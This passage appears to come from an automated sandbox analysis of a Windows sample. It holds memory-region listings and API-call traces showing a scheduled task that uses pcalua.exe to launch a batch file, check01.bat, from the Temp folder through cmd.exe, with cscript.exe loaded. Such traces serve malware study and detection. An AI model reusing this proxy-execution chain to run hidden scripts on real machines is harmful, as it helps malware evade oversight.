region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 1711
start_va = 0x120000
end_va = 0x120fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 1712
start_va = 0x2c70000
end_va = 0x2ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c70000"
filename = ""
Region:
id = 1713
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1714
start_va = 0x7fefc180000
end_va = 0x7fefc2abfff
monitored = 0
entry_point = 0x7fefc1894bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1715
start_va = 0x130000
end_va = 0x130fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 1716
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1717
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 1718
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1719
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1720
start_va = 0x150000
end_va = 0x153fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 1721
start_va = 0x160000
end_va = 0x187fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 1722
start_va = 0x310000
end_va = 0x310fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000310000"
filename = ""
Region:
id = 1723
start_va = 0x2cf0000
end_va = 0x2df0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cf0000"
filename = ""
Region:
id = 1724
start_va = 0x2cf0000
end_va = 0x2df0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cf0000"
filename = ""
Region:
id = 1725
start_va = 0x2cf0000
end_va = 0x2df0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cf0000"
filename = ""
Region:
id = 1726
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1727
start_va = 0x320000
end_va = 0x37bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shell32.dll.mui"
filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui")
Region:
id = 1728
start_va = 0x150000
end_va = 0x153fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1729
start_va = 0x1cd0000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 1730
start_va = 0x380000
end_va = 0x383fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1731
start_va = 0x1e60000
end_va = 0x1ec5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1732
start_va = 0x1ef0000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ef0000"
filename = ""
Region:
id = 1733
start_va = 0x7fefdba0000
end_va = 0x7fefdd17fff
monitored = 0
entry_point = 0x7fefdba10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 1734
start_va = 0x7fefdd20000
end_va = 0x7fefde49fff
monitored = 0
entry_point = 0x7fefdd210d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 1735
start_va = 0x7feff170000
end_va = 0x7feff3c8fff
monitored = 0
entry_point = 0x7feff171340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 1736
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1737
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1738
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1739
start_va = 0x390000
end_va = 0x390fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 1740
start_va = 0x2e90000
end_va = 0x2f0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e90000"
filename = ""
Region:
id = 1741
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 1742
start_va = 0x2fc0000
end_va = 0x303ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002fc0000"
filename = ""
Region:
id = 1743
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 1744
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1745
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1746
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1747
start_va = 0x630000
end_va = 0x63cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 1748
start_va = 0x2cf0000
end_va = 0x2d6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002cf0000"
filename = ""
Region:
id = 1749
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Thread:
id = 85
os_tid = 0xc1c
[0374.260] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ff30 | out: lpSystemTimeAsFileTime=0x20ff30*(dwLowDateTime=0xf724bf40, dwHighDateTime=0x1dab598))
[0374.260] GetCurrentProcessId () returned 0xc18
[0374.260] GetCurrentThreadId () returned 0xc1c
[0374.260] GetTickCount () returned 0x1425d23
[0374.260] QueryPerformanceCounter (in: lpPerformanceCount=0x20ff38 | out: lpPerformanceCount=0x20ff38*=2125495752307) returned 1
[0374.261] GetStartupInfoW (in: lpStartupInfo=0x20fee0 | out: lpStartupInfo=0x20fee0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1dab598f724bf40, hStdOutput=0x1eee16b5673, hStdError=0x0))
[0374.261] GetModuleHandleW (lpModuleName=0x0) returned 0xffe50000
[0374.261] __set_app_type (_Type=0x2)
[0374.261] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe51798) returned 0x0
[0374.261] __wgetmainargs (in: _Argc=0xffe53120, _Argv=0xffe53130, _Env=0xffe53128, _DoWildCard=0, _StartInfo=0xffe5313c | out: _Argc=0xffe53120, _Argv=0xffe53130, _Env=0xffe53128) returned 0
[0374.263] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0374.263] RegisterClassExW (param_1=0x20fe00) returned 0xc1bf
[0374.264] CreateWindowExW (dwExStyle=0x0, lpClassName="PCALUA", lpWindowName="PCALUA", dwStyle=0xcf0000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xffe50000, lpParam=0x0) returned 0x50300
[0374.305] SetForegroundWindow (hWnd=0x50300) returned 0
[0374.411] CommandLineToArgvW (in: lpCmdLine="-a \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"", pNumArgs=0x20feb0 | out: pNumArgs=0x20feb0) returned 0x3d41a0*="-a"
[0374.411] _wcsicmp (_String1="-a", _String2="-l") returned -11
[0374.411] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", _String2="-l") returned 54
[0374.412] PcaLaunchApplicationWithConsent () returned 0x1
[0375.073] LocalFree (hMem=0x3d41a0) returned 0x0
[0375.073] exit (_Code=0)
Thread:
id = 86
os_tid = 0x4c0
Thread:
id = 87
os_tid = 0x1c4
Thread:
id = 88
os_tid = 0x504
Thread:
id = 89
os_tid = 0x82c
Process:
id = "9"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x1fbdb000"
os_pid = "0xb34"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "8"
os_parent_pid = "0xc18"
cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\" \""
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1750
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1751
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1752
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1753
start_va = 0xf0000
end_va = 0x1effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1754
start_va = 0x4a250000
end_va = 0x4a2a8fff
monitored = 1
entry_point = 0x4a2590b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 1755
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1756
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1757
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1758
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1759
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1760
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1761
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1762
start_va = 0x1f0000
end_va = 0x2fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 1763
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1764
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1765
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1766
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1767
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1768
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1769
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1770
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1771
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 1772
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1773
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1774
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1775
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1776
start_va = 0xc0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1777
start_va = 0x300000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 1778
start_va = 0x400000
end_va = 0x587fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000400000"
filename = ""
Region:
id = 1779
start_va = 0x590000
end_va = 0x5b8fff
monitored = 0
entry_point = 0x591010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1780
start_va = 0x590000
end_va = 0x5b8fff
monitored = 0
entry_point = 0x591010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1781
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1782
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1783
start_va = 0x590000
end_va = 0x710fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000590000"
filename = ""
Region:
id = 1784
start_va = 0x720000
end_va = 0x1b1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000720000"
filename = ""
Region:
id = 1785
start_va = 0x1b20000
end_va = 0x1b3ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 1786
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1787
start_va = 0xd0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1788
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1789
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1790
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1791
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1792
start_va = 0x1f0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 1793
start_va = 0x200000
end_va = 0x2fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1794
start_va = 0x1b40000
end_va = 0x1e0efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1835
start_va = 0xfff30000
end_va = 0xfff58fff
monitored = 0
entry_point = 0xfff328c4
region_type = mapped_file
name = "cscript.exe"
filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")
Region:
id = 1938
start_va = 0x1e10000
end_va = 0x1e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e10000"
filename = ""
Thread:
id = 90
os_tid = 0x43c
[0375.545] GetProcAddress (hModule=0x77660000, lpProcName="SetConsoleInputExeNameW") returned 0x77670c80
[0375.546] GetProcessHeap () returned 0x200000
[0375.546] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x21c5b0
[0375.546] GetProcessHeap () returned 0x200000
[0375.547] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c5b0 | out: hHeap=0x200000) returned 1
[0375.552] _wcsicmp (_String1="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"", _String2=")") returned -7
[0375.552] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 68
[0375.552] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 68
[0375.552] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 71
[0375.552] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 71
[0375.552] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 80
[0375.552] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"") returned 80
[0375.552] GetProcessHeap () returned 0x200000
[0375.553] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb0) returned 0x219db0
[0375.553] GetProcessHeap () returned 0x200000
[0375.553] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x76) returned 0x219e70
[0375.553] GetProcessHeap () returned 0x200000
[0375.553] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x14) returned 0x2185a0
[0375.558] GetConsoleTitleW (in: lpConsoleTitle=0x1efb70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0375.558] GetFileAttributesW (lpFileName="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\"" (normalized: "c:\\windows\\system32\\\"c:\\users\\keecfm~1\\appdata\\local\\temp\\check01.bat\"")) returned 0xffffffff
[0375.559] _wcsicmp (_String1="\"C", _String2="DIR") returned -66
[0375.559] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67
[0375.559] _wcsicmp (_String1="\"C", _String2="DEL") returned -66
[0375.559] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82
[0375.559] _wcsicmp (_String1="\"C", _String2="COPY") returned -65
[0375.559] _wcsicmp (_String1="\"C", _String2="CD") returned -65
[0375.560] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65
[0375.560] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80
[0375.560] _wcsicmp (_String1="\"C", _String2="REN") returned -80
[0375.560] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67
[0375.560] _wcsicmp (_String1="\"C", _String2="SET") returned -81
[0375.560] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78
[0375.560] _wcsicmp (_String1="\"C", _String2="DATE") returned -66
[0375.560] _wcsicmp (_String1="\"C", _String2="TIME") returned -82
[0375.560] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78
[0375.560] _wcsicmp (_String1="\"C", _String2="MD") returned -75
[0375.560] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75
[0375.560] _wcsicmp (_String1="\"C", _String2="RD") returned -80
[0375.560] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80
[0375.560] _wcsicmp (_String1="\"C", _String2="PATH") returned -78
[0375.560] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69
[0375.561] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81
[0375.561] _wcsicmp (_String1="\"C", _String2="CLS") returned -65
[0375.561] _wcsicmp (_String1="\"C", _String2="CALL") returned -65
[0375.561] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84
[0375.561] _wcsicmp (_String1="\"C", _String2="VER") returned -84
[0375.561] _wcsicmp (_String1="\"C", _String2="VOL") returned -84
[0375.561] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67
[0375.561] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81
[0375.561] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67
[0375.561] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82
[0375.561] _wcsicmp (_String1="\"C", _String2="START") returned -81
[0375.561] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66
[0375.561] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73
[0375.561] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75
[0375.561] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78
[0375.561] _wcsicmp (_String1="\"C", _String2="POPD") returned -78
[0375.561] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63
[0375.562] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68
[0375.562] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64
[0375.562] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65
[0375.562] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75
[0375.562] _wcsicmp (_String1="\"C", _String2="DIR") returned -66
[0375.562] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67
[0375.562] _wcsicmp (_String1="\"C", _String2="DEL") returned -66
[0375.562] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82
[0375.562] _wcsicmp (_String1="\"C", _String2="COPY") returned -65
[0375.562] _wcsicmp (_String1="\"C", _String2="CD") returned -65
[0375.562] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65
[0375.562] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80
[0375.562] _wcsicmp (_String1="\"C", _String2="REN") returned -80
[0375.562] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67
[0375.562] _wcsicmp (_String1="\"C", _String2="SET") returned -81
[0375.563] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78
[0375.563] _wcsicmp (_String1="\"C", _String2="DATE") returned -66
[0375.563] _wcsicmp (_String1="\"C", _String2="TIME") returned -82
